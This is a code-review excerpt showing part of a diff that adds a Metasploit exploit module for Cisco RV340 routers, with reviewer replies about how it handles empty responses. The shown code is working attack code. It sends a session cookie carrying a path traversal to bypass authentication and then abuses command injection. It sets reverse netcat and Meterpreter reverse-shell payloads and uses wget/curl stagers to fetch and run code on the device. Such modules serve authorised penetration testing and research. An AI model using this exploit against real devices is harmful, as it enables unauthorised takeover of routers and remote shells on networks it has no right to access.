modules/exploits/linux/http/cisco_rv340_lan.rb

```diff
@@ -0,0 +1,190 @@
+                'PAYLOAD' => 'cmd/unix/reverse_netcat',
+                'BadChars' => '\''
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_ARMLE],
+              'Type' => :linux_dropper,
+              'Payload' => {
+                'BadChars' => '\''
+              },
+              'CmdStagerFlavor' => [ 'wget', 'curl' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
+          'MeterpreterTryToFork' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base path', '/'])
+      ]
+    )
+  end
+
+  # sessionid utilized later needs to be set to length
+  # of 16 or exploit will fail.  Tested with lengths
+  # 14-17
+  def generate_session_id
+    return Rex::Text.rand_text_alphanumeric(16)
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => '/upload',
+      'headers' => {
+        'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id
+      }
+    }, 10)
+
+    # A proper "upload" will trigger file creation.  So created above is an incorrect "upload" call to avoid file
+    # creation. The router return a status code 405 Not Allowed if authentication has been bypassed by above request.
+    # The firmware containing this authentication bypass also contains the command injection vulnerability that will be
+    # abused during actual exploitation. Non-vulnerable firmware versions will respond with 403 Forbidden.
+    if res.nil?
+      return CheckCode::Unknown('The device did not respond to request packet.')
+    elsif !res.nil? && res.code == 405
+      return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')
+    elsif res.code == 403
+      return CheckCode::Safe('The device is not vulnerable to exploitation.')
+    else # Catch-all
+      return CheckCode::Unknown('The target responded in such a way that exploitation in unknown and unlikely.')
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    res = send_exploit(cmd)
+
+    # Successful unix_cmd shells should not produce a response. But check the response code if it does, and throw
+    # Failure::NotVulnerable if 403 Forbidden is status code
+    if target['Type'] == :unix_cmd && !res.nil? && res.code == 403
+      fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable')
+    end
```

Comment:
This logic will fall through if `res` is `nil` and the target type is `unix_cmd` to the `print_good` line. Need to apply the same `fail_with(Failure::Unreachable` logic here.

Reply:
The successful exploitation during unix_cmd does not produce a response (res).  I was also unaware of the '&' operator after objects.  I pushed a commit modifying this check.  The target is not vulnerable if a 403 is received.

Reply:
My bad forgot about that and made a bad edit as a result. Good spotting and this fix looks good! Marking this as resolved.